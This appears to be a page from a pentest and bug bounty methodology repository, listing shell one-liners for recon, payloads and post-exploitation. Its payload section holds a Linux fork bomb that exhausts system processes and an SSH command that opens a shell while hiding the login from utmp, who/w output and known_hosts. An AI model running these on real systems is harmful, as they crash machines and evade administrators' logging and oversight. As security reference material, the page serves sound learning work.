Bug Bounty Methodology


1. Scope, Ethics, Code of Conduct, etc.
2. Reconnaissance and Information Gathering
4. Authentication and Authorization Attacks

RootDown Pentest & Bug Bounty


Helpful Oneliners

One-Lin3r one-liner tool for privilege escalation and more

Recon

#List all nmap scripts
ls /usr/share/nmap/scripts | sed 's/\.nse$//' | sort

Payloads

# "Linux Fork Bomb" - Create processes until the system "crashes"
:(){ :|: & };:
# "Almost Invisible SSH" - This will not add your user to the /var/log/utmp file, and you won't show up in the w or who output of logged-in users. It will bypass profile and bash profile as well. On your client side it will stop logging the host name to ~/.ssh/known_hosts. Credit: netmux
ssh -o UserKnownHostsFile=/dev/null -T user@example.com "bash -i"

C2 & PostOP

#Delete empty files
alias rm0="find . -maxdepth 1 -size 0 -delete -print"

[!IMPORTANT] Material in this repository is intended purely for informational and educational purposes. Don't crime.


P.S.: Huge thanks to every author of these sources. Feel free to contribute or suggest improvements! We believe in the power of community and collaboration. Every single contribution, however small, is valued and appreciated.